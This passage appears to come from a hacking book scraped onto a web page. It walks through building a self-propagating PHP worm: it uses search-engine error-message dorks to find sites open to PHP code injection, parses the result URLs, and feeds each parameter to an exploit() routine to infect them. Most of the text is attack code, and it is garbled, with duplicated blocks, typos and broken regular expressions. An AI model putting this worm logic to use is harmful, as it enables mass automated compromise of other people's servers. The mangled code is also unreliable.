The Search | Hacker Web Exploition Uncovered

So, an abstract worm could be created, for example, in PHP. The PHP interpreter is supported on many servers.

As you know, the vulnerability of the PHP source code injection type is dangerous. Therefore, it could be exploited to obtain privileges on a server.

This vulnerability is comprehensively described in Chapter 2 , which contains examples of vulnerable systems and scripts that allow an attacker to obtain control over the sample systems by exploiting this vulnerability. In addition, this chapter contains classification of the vulnerability.

The first thing the worm should do after its activation is a search for vulnerable systems. The simplest solution to this would involve the use of well-known search systems, such as Google. However, any other search system or even a few systems could be used.

Create two string arrays. Every time, a search phrase will be created from two random strings from these arrays. The strings are selected so that the search results are likely to contain links to vulnerable sites.

Keywords
$mainsearchl=array( "Failed opening for inclusion", "Warning main", "failed to open stream", "failed", "No such file or directory", "not found" ); $mainsearch2=array( "", "index", "data", "main", "left", "id", "", "menu", "", "", "", "and" "error", "", "", "name" "make", "test", "home", "", "", "test", "", "list", "right", "temp", "template", "mainpage", "link", "banner" );

Keywords

 $mainsearchl=array( "Failed opening for inclusion", "Warning main", "failed to open stream", "failed", "No such file or directory", "not found" ); $mainsearch2=array( "", "index", "data", "main", "left", "id",  "",  "menu", "", "", "", "and" "error", "", "", "name" "make", "test", "home", "", "", "test", "", "list", "right", "temp", "template", "mainpage", "link", "banner" );

Empty strings in the second array are used in requests that contain only phrases from the first array without any strings added. Then, the worm requests a random page from the search results.

Google restricts the number of search results, and the script of the worm contains this restriction.

This is how a request to the search system is created.

A request to the search system
global $mainsearchl, $mainsearch2, $explstring; $wl=$mainsearchl[rand(0, sizeof($mainsearchl)-1)]; $w2=$mainsearch2[rand(0, sizeof($mainsearch2)-1)]; $w=str_replace(" ", "+", $w1." ".$w2); $max=990; // The number of links returned by Google :( $start=rand(50, $max); $q="http://www.gogle,ru/search?qw=".$w, "&hl=ru&lr=&ie=UTF-8&start=$start&sa=N"; //&filter=0 $rx=file($q); $search=implode("", $q);

A request to the search system

 global $mainsearchl, $mainsearch2, $explstring; $wl=$mainsearchl[rand(0, sizeof($mainsearchl)-1)]; $w2=$mainsearch2[rand(0, sizeof($mainsearch2)-1)]; $w=str_replace(" ", "+", $w1." ".$w2); $max=990; // The number of links returned by Google :( $start=rand(50, $max); $q="http://www.gogle,ru/search?qw=".$w,      "&hl=ru&lr=&ie=UTF-8&start=$start&sa=N"; //&filter=0 $rx=file($q); $search=implode("", $q);

After the script is executed, the $search variable will contain the result of the search request.

In a more complex situation, for other search systems, you might have to write an HTTP request with appropriate parameters.

Another variant of a request to the search system
global $mainsearchl, $mainsearch2, $explstring; $w1 ⁼ $mainsearch1[rand(0, sizeof($mainsearchl)-1)]; $w2=$mainsearch2[rand(0, sizeof($mainsearch2)-1)]; $w=str_replace(" ", "+", $w1." ".$w2); $max=990; // The number of links returned by Google :( $start=rand(50, $max); $q="GET /search?qw=".$w."&h1=ru&lr=&ie=UTF-8&start=$start&sa=N HTTP/1.1\r\n". "Host: www.google.com\r\n". "User-Agent: Mozilla/5.0 (Windows NT 5.0; en-US; rv:1.7.1) Gecko/20040707\r\n". "Accept: /\r\n". "Accept-Language: en-us\r\n". "Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7\r\n". "Connection: close\r\n". "\r\n"; $socket = socket_create (AF_INET, SOCK_STREAM, 0); $target=gethostbyname("www.google.com"); $result = socket_connect ($socket, $target, 80); socket_write($socket, $q, strlen($in)); global $mainsearchl, $mainsearch2, $explstring; $w1 ⁼ $mainsearch1[rand(0, sizeof($mainsearchl)-1)]; $w2=$mainsearch2[rand(0, sizeof($mainsearch2)-1)]; $w=str_replace(" ", "+", $w1." ".$w2); $max=990; // The number of links returned by Google :( $start=rand(50, $max); $q="GET /search?qw=".$w."&h1=ru&lr=&ie=UTF-8&start=$start&sa=N HTTP/1.1\r\n". "Host: www.google.com\r\n". "User-Agent: Mozilla/5.0 (Windows NT 5.0; en-US; rv:1.7.1) Gecko/20040707\r\n". "Accept: /\r\n". "Accept-Language: en-us\r\n". "Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7\r\n". "Connection: close\r\n". "\r\n"; $socket = socket_create (AF_INET, SOCK_STREAM, 0); $target=gethostbyname("www.google.com"); $result = socket_connect ($socket, $target, 80); socket_write($socket, $q, strlen($in)); $0=""; while ($out = socket_read ($socket, 2048)) { $o.=$out; } $search=$o; =""; while ($out = socket_read ($socket, 2048)) { $o.=$out; } $search=$o;

Another variant of a request to the search system

 global $mainsearchl, $mainsearch2, $explstring; $w1 ⁼ $mainsearch1[rand(0, sizeof($mainsearchl)-1)]; $w2=$mainsearch2[rand(0, sizeof($mainsearch2)-1)]; $w=str_replace(" ", "+", $w1." ".$w2); $max=990; // The number of links returned by Google :( $start=rand(50, $max); $q="GET /search?qw=".$w."&h1=ru&lr=&ie=UTF-8&start=$start&sa=N HTTP/1.1\r\n".       "Host: www.google.com\r\n".       "User-Agent: Mozilla/5.0 (Windows NT 5.0; en-US; rv:1.7.1) Gecko/20040707\r\n".       "Accept: */*\r\n".       "Accept-Language: en-us\r\n".       "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n".       "Connection: close\r\n".       "\r\n"; $socket = socket_create (AF_INET, SOCK_STREAM, 0); $target=gethostbyname("www.google.com"); $result = socket_connect ($socket, $target, 80); socket_write($socket, $q, strlen($in));  global $mainsearchl, $mainsearch2, $explstring; $w1 ⁼ $mainsearch1[rand(0, sizeof($mainsearchl)-1)]; $w2=$mainsearch2[rand(0, sizeof($mainsearch2)-1)]; $w=str_replace(" ", "+", $w1." ".$w2); $max=990; // The number of links returned by Google :( $start=rand(50, $max); $q="GET /search?qw=".$w."&h1=ru&lr=&ie=UTF-8&start=$start&sa=N HTTP/1.1\r\n". "Host: www.google.com\r\n". "User-Agent: Mozilla/5.0 (Windows NT 5.0; en-US; rv:1.7.1) Gecko/20040707\r\n". "Accept: */*\r\n". "Accept-Language: en-us\r\n". "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n". "Connection: close\r\n". "\r\n"; $socket = socket_create (AF_INET, SOCK_STREAM, 0); $target=gethostbyname("www.google.com"); $result = socket_connect ($socket, $target, 80); socket_write($socket, $q, strlen($in)); $0=""; while ($out = socket_read ($socket, 2048)) { $o.=$out; } $search=$o; 
 =""; while ($out = socket_read ($socket, 2048)) {     $o.=$out; } $search=$o;

After the script is executed, the $search variable will contain the text of an HTML page with the response to the request.

Now, it is necessary to parse the response to find potentially vulnerable sites.

You can use regular expressions to do this.

Parsing the response
preg_match_all("/(https?\: \/\/ (\w\. \/\\%". "\d\-\_)+\?(\w\.\/\\?\d\=\&\%\-\_\+)+)/", $search, $re); unset($rr); foreach($re[1] as $k=>$v) { if(!preg_match("/google/", $v)) $rr[]=$v; }

The $rr array will contain the addresses of potentially vulnerable sites.

It only remains for the worm to try to infect each of the sites. To do this, the worm will call an abstract function, exploit() .

An attempted infection
if(sizeof($rr)>0) foreach($rr as $k=>$v) { if(preg_match_all("/(\&\?)((\wl-_%\d)+)\=". "((W-_%d\/\\.\?\+))?/", $v, $r)) { preg_match("/^(hops?\:\/\/(\wl\.\/\\%\dl\-\_)+)\?/" , $v, $r2); foreach($r as $kl=>$vl) { $x=$r2[1]."?"; foreach($r[2] as $k2=>$v2) // The cross product { if($k2==$k1) { if(empty ($r[4] [$k2])) $x.="[STRING]&"; else $x.=$r[2][$k2]."=[STRING*]&"; }else $x.=($r[2][$k2]."=".$r[4] [$k2]."&"); } exploit($x) } } }

An attempted infection

 if(sizeof($rr)>0) foreach($rr as $k=>$v)  {    if(preg_match_all("/(\&\?)((\wl-_%\d)+)\=".        "((W-_%d\/\\.\?\+)*)?/", $v, $r))    {       preg_match("/^(hops?\:\/\/(\wl\.\/\\%\dl\-\_)+)\?/"                                           , $v, $r2);       foreach($r as $kl=>$vl)       {         $x=$r2[1]."?";         foreach($r[2] as $k2=>$v2) // The cross product         {            if($k2==$k1)            {              if(empty ($r[4] [$k2])) $x.="[*STRING*]&";              else $x.=$r[2][$k2]."=[*STRING*]&";            }else              $x.=($r[2][$k2]."=".$r[4] [$k2]."&");         }         exploit($x)       }    }  }

In this code, an attempt to exploit the vulnerability is made for each potentially vulnerable site. The attempt involves substituting the values of each parameter one by one with the [ *STRING*] string* ] string. This string will be used by the exploit() function later.

For example, suppose the $rr array initially contains the following URLs:

http://site1/1.php?a=123
http://site2/test.php?bbb=ccc&qq=abcd
http://site3/get.php?abcd
http://site3/get.php?abcd&cdef
http://site2/test.php?bbb=ccc&qq=abcd&ppp&ddd

Therefore, the $x variable will take the following values in turn :

http://site1/1.php?a=[*STRTNG*]
http://site2/test.php?bbb=[*STRING*]&qq=abcd
http://site2/test.php?bbb=ccc&qq=[*STRING*]
http://site3/get.php?[*STRTNG*]
http://site3/get.php?[*STRING*]&cdef
http://site3/get.php?abcd&[*STRING*]
http://site2/test.php?bbb=[*STRING*]&qq=abcd&ppp&ddd
http://site2/test.php?bbb=ccc&qq=[*STRING*]&ppp&ddd
http://site2/test.php?bbb=ccc&qq=abcd&[*STRING*]&ddd
http://site2/test.php?bbb=ccc&qq=abcd&ppp&[*STRING*]

Then, an attempt is made to infect each value of the $x variable.